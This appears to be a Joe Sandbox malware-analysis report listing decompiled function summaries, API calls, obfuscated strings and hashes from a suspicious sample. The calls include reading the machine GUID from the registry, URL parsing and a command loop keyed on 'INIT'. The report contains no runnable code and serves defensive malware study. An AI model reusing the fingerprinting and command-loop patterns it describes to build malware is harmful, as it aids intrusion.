            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: task$char_traitsoperator!=
            • String ID: $($0$8$W$nwntailncasvksrgvzxnrejxcyyxomjuszgkeftopscvymwbvxagssvvhfojrxjsepuidtjncng
            • API String ID: 2802545854-1628632686
            • Opcode ID: 70456edd68f54d3f684b554ea1fa5a11351423e303f59b04d2beabe7929b21bd
            • Instruction ID: c0945bdccadd9230b56f350ee444188f1041a6d8f75094c7e4d7e1900d694064
            • Opcode Fuzzy Hash: 70456edd68f54d3f684b554ea1fa5a11351423e303f59b04d2beabe7929b21bd
            • Instruction Fuzzy Hash: A1515470D1560CDEDB04CFB8D954BBEBBB0FB54308F10421AE601EA281EF799A44DB51
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • EnterCriticalSection.KERNEL32(02B8A088), ref: 02B86971
            • StrCmpNIA.SHLWAPI(?,?,00000000), ref: 02B869AA
            • LeaveCriticalSection.KERNEL32(02B8A088,00000000), ref: 02B869C6
            • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B86A20
            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B86A27
            • LeaveCriticalSection.KERNEL32(02B8A088,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B86A3D
            • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B86A57
            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B86A5E
            • LeaveCriticalSection.KERNEL32(02B8A088,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B86A6F
            • GetProcessHeap.KERNEL32(00000008,?,?), ref: 02B86A7B
            • HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B86A82
            • LeaveCriticalSection.KERNEL32(02B8A088), ref: 02B86A93
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: Heap$CriticalSection$Leave$Process$Alloc$EnterFree
            • String ID:
            • API String ID: 2132424838-0
            • Opcode ID: b603b6b1ad36ce945b661801c33ffd2297be325941b26259784915c1d27bbe57
            • Instruction ID: 98aea2331700c84334ac2baa6f2fec2a4683d19b2dd0be6300be550a7ad5ba2d
            • Opcode Fuzzy Hash: b603b6b1ad36ce945b661801c33ffd2297be325941b26259784915c1d27bbe57
            • Instruction Fuzzy Hash: 2431DCB1A802019FEB147F74EC4CB667B69FB8939AF1858AAF62ECB141D7308455C750
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • _free.LIBCMT ref: 008F8228
              • Part of subcall function 008F7FB2: HeapFree.KERNEL32(00000000,00000000,?,008F9DC0,?,00000000,?,?,?,008F9DE7,?,00000007,?,?,008FA25B,?), ref: 008F7FC8
              • Part of subcall function 008F7FB2: GetLastError.KERNEL32(?,?,008F9DC0,?,00000000,?,?,?,008F9DE7,?,00000007,?,?,008FA25B,?,?), ref: 008F7FDA
            • _free.LIBCMT ref: 008F8234
            • _free.LIBCMT ref: 008F823F
            • _free.LIBCMT ref: 008F824A
            • _free.LIBCMT ref: 008F8255
            • _free.LIBCMT ref: 008F8260
            • _free.LIBCMT ref: 008F826B
            • _free.LIBCMT ref: 008F8276
            • _free.LIBCMT ref: 008F8281
            • _free.LIBCMT ref: 008F828F
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: c540df3a73a432dcb1b213847b1ca2df81791eed844c6886f9fd6d13152e640b
            • Instruction ID: 1ce4681e76c820f1878bc3a9843f9545eb26dbacd9acb19223a4f9da3a85b8bd
            • Opcode Fuzzy Hash: c540df3a73a432dcb1b213847b1ca2df81791eed844c6886f9fd6d13152e640b
            • Instruction Fuzzy Hash: AD21877690410DAFDB41EFA8C881DEE7BB9FF08340B004165B755DB221DB31EA948B91
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 02B8700A
            • RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 02B87026
            • GetProcessHeap.KERNEL32(00000008,?), ref: 02B87039
            • HeapAlloc.KERNEL32(00000000), ref: 02B87040
            • RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 02B8705D
            • RegCloseKey.ADVAPI32(80000002), ref: 02B87069
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: HeapQueryValue$AllocCloseOpenProcess
            • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
            • API String ID: 2639912721-1211650757
            • Opcode ID: 61f398839a36291a72ba7f17ce78013a27db84e2081427184a392f5b452bd532
            • Instruction ID: 455c13d5e26a3189b9317d8c7bc163357add6d9a15db77e0cb8b0fcf99195dc1
            • Opcode Fuzzy Hash: 61f398839a36291a72ba7f17ce78013a27db84e2081427184a392f5b452bd532
            • Instruction Fuzzy Hash: 1F31B039E00215AAEB31AB64CC45BBEF7B9EF0470CF344499E94DD7261EB709541D790
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: task$char_traitsoperator!=
            • String ID: 1$H$P$jqzoubnuymkarflrgsblnyuijtzdyutycdfdhtloaqug
            • API String ID: 2802545854-3608006743
            • Opcode ID: 6951466ce9fee0af6759c1552877d51cde37bd2dbbe4bbb162a921972a160412
            • Instruction ID: 3520c4b39bfbfac4cc3c47cdec1881eca56cecbc520c05ac7434d4f1643dfcb2
            • Opcode Fuzzy Hash: 6951466ce9fee0af6759c1552877d51cde37bd2dbbe4bbb162a921972a160412
            • Instruction Fuzzy Hash: 0D411270D1025CDEDF14DFB8D999BFDBBB0FB40708F20412AE912A6281DB785A49DB51
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: char_traits
            • String ID: &$8$9$jgjqrkqomrozhbdhmdxtwulfach$uqip
            • API String ID: 1158913984-1523665428
            • Opcode ID: 7d4f9812f230e4bde0f3419d98a8389410a7ddc0e426d58ada630c6e0d5e1192
            • Instruction ID: 51568156ed71db560171c4647fab3db74d33f36ab78a815e91e640a210440cf1
            • Opcode Fuzzy Hash: 7d4f9812f230e4bde0f3419d98a8389410a7ddc0e426d58ada630c6e0d5e1192
            • Instruction Fuzzy Hash: 2C411571E1524DCEDB14DFB8C955BBDBFB0FB44308F20811AD112AB288DBB55A49DB42
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            • jzdwqwyumqammpueooowjjgvtxkqyegzdhdgzslgyajsclbzvvlumjujvworvqtznfkokyknwpdvh, xrefs: 008F276C
            • wmralfjjyxjpaaahqtyukotytfokitzqpzktxxpjlasxwiqxteluyutwbngkpji, xrefs: 008F2746, 008F2781, 008F279E
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: task$char_traitsoperator!=
            • String ID: jzdwqwyumqammpueooowjjgvtxkqyegzdhdgzslgyajsclbzvvlumjujvworvqtznfkokyknwpdvh$wmralfjjyxjpaaahqtyukotytfokitzqpzktxxpjlasxwiqxteluyutwbngkpji
            • API String ID: 2802545854-3928441437
            • Opcode ID: ed8d786d5e60915b10e5e9f4a057c18a100d941e6724ee6ee43a15d509a56ed0
            • Instruction ID: 549f6fbf45da5ddb852c737fe3c51803d624584eb190126b76d8db5c9866017e
            • Opcode Fuzzy Hash: ed8d786d5e60915b10e5e9f4a057c18a100d941e6724ee6ee43a15d509a56ed0
            • Instruction Fuzzy Hash: A4416470D1468CCEDB10DFB8D855BEEBBB4FB55308F10816AD105BB281DB785A49CB62
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            • cmmaewimvbelpxqmmrwavslbvxckdjjxygghbhnehbeilkkwojuodtbqctfcndflgicarztuniwfnttitcozeduy, xrefs: 008F24A0
            • fwtzeppezjvazhyujtmjporsiuhoepcyezpzrndtdjonhkfwspgmjwijppeqbrmoricjjfsnrrohmmtnhquudfm, xrefs: 008F24CF
            • dzydwibcsmroxflhizzvayjcy, xrefs: 008F2482
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: task$char_traits
            • String ID: cmmaewimvbelpxqmmrwavslbvxckdjjxygghbhnehbeilkkwojuodtbqctfcndflgicarztuniwfnttitcozeduy$dzydwibcsmroxflhizzvayjcy$fwtzeppezjvazhyujtmjporsiuhoepcyezpzrndtdjonhkfwspgmjwijppeqbrmoricjjfsnrrohmmtnhquudfm
            • API String ID: 1455298312-3639978120
            • Opcode ID: f21e6076bd677f09f03c43ad65e94fe030eadc32ea2284184397336a25b2a09a
            • Instruction ID: 6dbd8aad02b07a0eef21280c74335563e76ba6a38110274c3f03466440e01ef1
            • Opcode Fuzzy Hash: f21e6076bd677f09f03c43ad65e94fe030eadc32ea2284184397336a25b2a09a
            • Instruction Fuzzy Hash: BD214431904A8CEECB01DFA8C825BEEBBB4FF56704F10425AE411AB291EF751B45CB91
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • type_info::operator==.LIBVCRUNTIME ref: 008F54FA
            • ___TypeMatch.LIBVCRUNTIME ref: 008F5608
            • _UnwindNestedFrames.LIBCMT ref: 008F575A
            • CallUnexpected.LIBVCRUNTIME ref: 008F5775
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
            • String ID: csm$csm$csm
            • API String ID: 2751267872-393685449
            • Opcode ID: 6c54fb2af0a0da8b73fa19984abcb1d8327cb2ffac72eef87069a534534e6415
            • Instruction ID: 0857a32247fc0508d49e373add51287fd4e710d26312afaae790189663236e2f
            • Opcode Fuzzy Hash: 6c54fb2af0a0da8b73fa19984abcb1d8327cb2ffac72eef87069a534534e6415
            • Instruction Fuzzy Hash: 6BB12471800A0DEBCF14EFB8D8819BEBBB5FF14315B14415AEB11AB212D735DA51CB92
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • InternetCrackUrlW.WININET(02B8A10C,00000000,00000000,0000003C), ref: 02B86515
            • GetProcessHeap.KERNEL32(00000008,00000001,02B8A10C), ref: 02B86537
            • HeapAlloc.KERNEL32(00000000), ref: 02B8653A
            • GetProcessHeap.KERNEL32(00000008,00000000,00000000), ref: 02B865A9
            • HeapAlloc.KERNEL32(00000000), ref: 02B865AC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: Heap$AllocProcess$CrackInternet
            • String ID: <
            • API String ID: 2637570027-4251816714
            • Opcode ID: 1c0f87296aeaf5b37f7716b6d73055c73f91e5ffade4d0358f7a2008c619cb88
            • Instruction ID: 0c0f506cda55c9cf30cab11076a4470ed96f3a9a0a536a82f9c63257414b37bc
            • Opcode Fuzzy Hash: 1c0f87296aeaf5b37f7716b6d73055c73f91e5ffade4d0358f7a2008c619cb88
            • Instruction Fuzzy Hash: DF51BE34A0024A8FDB24EF68D484BAEB7F9FF49308F2844ADD459DB642DB71D942C750
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • _ValidateLocalCookies.LIBCMT ref: 008F4D87
            • ___except_validate_context_record.LIBVCRUNTIME ref: 008F4D8F
            • _ValidateLocalCookies.LIBCMT ref: 008F4E18
            • __IsNonwritableInCurrentImage.LIBCMT ref: 008F4E43
            • _ValidateLocalCookies.LIBCMT ref: 008F4E98
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
            • String ID: csm
            • API String ID: 1170836740-1018135373
            • Opcode ID: 30982f10e1fe6c8c9fe57969ba9959e71674c99972c1bd96456a80a665ea2fed
            • Instruction ID: be9000ef6cdd1a0319469fa76f418f0d0aa3e4ee12ae24d693ca2b50deeafe74
            • Opcode Fuzzy Hash: 30982f10e1fe6c8c9fe57969ba9959e71674c99972c1bd96456a80a665ea2fed
            • Instruction Fuzzy Hash: D5416034A0020D9BCF10EF78C885AAFBBB5FF85324F148156EA159B392D731AA55CB91
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID: api-ms-$ext-ms-
            • API String ID: 0-537541572
            • Opcode ID: e60d56ea068c61182835c80510a399f5f6faf915869afa79d0d05f8b0dbe93d8
            • Instruction ID: 3819e4408cbc44bb95ee530e4b0aae3f37a1d8d74daea8c340f805af02fa22bd
            • Opcode Fuzzy Hash: e60d56ea068c61182835c80510a399f5f6faf915869afa79d0d05f8b0dbe93d8
            • Instruction Fuzzy Hash: 6F21DBB1A4522CAFDB258B389C49A7A3669FF61770B100110EF0DF71D1E6B0ED0095FA
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: task$char_traitsoperator!=
            • String ID: ianh$lgorocmtlicgntojuhnxsyvwoxnzmsynfanydnuerqa$oyr
            • API String ID: 2802545854-2962047866
            • Opcode ID: a058471ff730b7d69325d478c4eb4063ad5ffc20c63b9b41e4041f63cb3c43df
            • Instruction ID: ff5f1a57de225d851da65f9b49f10d4f27c83d2050bd0d89b40c287b25491d7a
            • Opcode Fuzzy Hash: a058471ff730b7d69325d478c4eb4063ad5ffc20c63b9b41e4041f63cb3c43df
            • Instruction Fuzzy Hash: 2C31167090465CDEEB20DBB8C855BEEBBB0FB44704F104199E149B7282DBB45B89CF61
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 008F9D96: _free.LIBCMT ref: 008F9DBB
            • _free.LIBCMT ref: 008F9E1C
              • Part of subcall function 008F7FB2: HeapFree.KERNEL32(00000000,00000000,?,008F9DC0,?,00000000,?,?,?,008F9DE7,?,00000007,?,?,008FA25B,?), ref: 008F7FC8
              • Part of subcall function 008F7FB2: GetLastError.KERNEL32(?,?,008F9DC0,?,00000000,?,?,?,008F9DE7,?,00000007,?,?,008FA25B,?,?), ref: 008F7FDA
            • _free.LIBCMT ref: 008F9E27
            • _free.LIBCMT ref: 008F9E32
            • _free.LIBCMT ref: 008F9E86
            • _free.LIBCMT ref: 008F9E91
            • _free.LIBCMT ref: 008F9E9C
            • _free.LIBCMT ref: 008F9EA7
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: f8652940eed608665d87997f49d8a726addb3db1c042498b6f01942da26be76f
            • Instruction ID: 7e7ff988a07ed4bd3fde6c679a896c483ceb171e6d0a5d1fb3569dee028164a9
            • Opcode Fuzzy Hash: f8652940eed608665d87997f49d8a726addb3db1c042498b6f01942da26be76f
            • Instruction Fuzzy Hash: 62115931944B09AAE630BBB9CC06FEBB79DFF01700F804814F399E6052DB65A9448762
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 008FC040
            • __fassign.LIBCMT ref: 008FC225
            • __fassign.LIBCMT ref: 008FC242
            • WriteFile.KERNEL32(?,008FAD05,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008FC28A
            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 008FC2CA
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 008FC372
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: FileWrite__fassign$ConsoleErrorLastOutput
            • String ID:
            • API String ID: 1735259414-0
            • Opcode ID: fcf376852b632e55a4b3e5f9ad6d2b0e27f757b293d31c8cb9b0ef5be058b719
            • Instruction ID: fd2c1c1daa6cccc6a6ea390fdf68d752e25572ad1a775a9d8e34b7aa633d3cef
            • Opcode Fuzzy Hash: fcf376852b632e55a4b3e5f9ad6d2b0e27f757b293d31c8cb9b0ef5be058b719
            • Instruction Fuzzy Hash: 17C17A75D0425D8FCB14CFA8C9809EDBBB5FF49318F28816AE956F7342D6319A42CB60
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • Sleep.KERNEL32(00000000), ref: 02B87DA6
            • lstrcmpA.KERNEL32(00000000,INIT), ref: 02B87DB3
            • StrToIntA.SHLWAPI(00000000), ref: 02B87E76
            • GetTickCount64.KERNEL32 ref: 02B8827B
              • Part of subcall function 02B855B0: GetProcessHeap.KERNEL32(00000008,00000001,02B87E3E,00000001,00000000), ref: 02B855B3
              • Part of subcall function 02B855B0: HeapAlloc.KERNEL32(00000000), ref: 02B855BA
            • StrToIntA.SHLWAPI(00000000), ref: 02B88174
            • StrToIntA.SHLWAPI(?), ref: 02B8817D
            • CreateThread.KERNEL32(00000000,00000000,Function_00007270,00000000,00000000,00000000), ref: 02B88191
            • CloseHandle.KERNEL32(00000000), ref: 02B8819C
              • Part of subcall function 02B855D0: GetProcessHeap.KERNEL32(00000000,00000000,02B882C5), ref: 02B855D7
              • Part of subcall function 02B855D0: HeapFree.KERNEL32(00000000), ref: 02B855DE
            • Sleep.KERNEL32(00000000), ref: 02B882D6
            Memory Dump Source
            • Source File: 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
            • Associated: 00000000.00000002.1657817836.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.1657850122.0000000002B8B000.00000002.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b80000_SecuriteInfo.jbxd
            Similarity
            • API ID: Heap$ProcessSleep$AllocCloseCount64CreateFreeHandleThreadTicklstrcmp
            • String ID:
            • API String ID: 1253608127-0
            • Opcode ID: 0805f3249855272a0bbcac2c16ed93ac050dcdb47b9789dccf755307535cb76c
            • Instruction ID: 79ddd2cc6d596c3e017744ac614159cc1e66f9173e0f0a3643327d69e6837842
            • Opcode Fuzzy Hash: 0805f3249855272a0bbcac2c16ed93ac050dcdb47b9789dccf755307535cb76c
            • Instruction Fuzzy Hash: 21219E71E0060997CB24BBB09840BAFB6BAAF44344F5004AAE81EA7290EF309904CF91
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetLastError.KERNEL32(?,?,008F509B,008F4C89,008F43FF), ref: 008F50B2
            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008F50C0
            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008F50D9
            • SetLastError.KERNEL32(00000000,008F509B,008F4C89,008F43FF), ref: 008F512B
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ErrorLastValue___vcrt_
            • String ID:
            • API String ID: 3852720340-0
            • Opcode ID: 48ce89071f2b523bc784db09261318ef9822522b8d13927bdb6b5baa0aeb644f
            • Instruction ID: 4cec1bd4f20a209595999141bd4e437679288ed2bc8fa5a57ff38380550243ca
            • Opcode Fuzzy Hash: 48ce89071f2b523bc784db09261318ef9822522b8d13927bdb6b5baa0aeb644f
            • Instruction Fuzzy Hash: C701243262DF195EEB2427B86C86A7B2A64FB55774730032AF750C10F0FEA14C557150
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 008F3040: char_traits.LIBCPMTD ref: 008F3080
            • task.LIBCPMTD ref: 008F1C63
            • task.LIBCPMTD ref: 008F1C72
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1657488948.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
            • Associated: 00000000.00000002.1657461293.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657513298.0000000000901000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657537036.0000000000908000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1657552396.000000000090A000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_8f0000_SecuriteInfo.jbxd
            Similarity
            • API ID: task$char_traits
            • String ID: O$ggieqzszmbzlvilbxhiegdimtjzyfwhho
            • API String ID: 1455298312-2259853572
            • Opcode ID: cb21f007a609bf1eba6dd406c1e2aba63e346896e1428c623c41a895d7f23d22
            • Instruction ID: b8568fbe88f774c1d491bb68f0ed2919e87fc5eef6f291b093ddf3401684961a
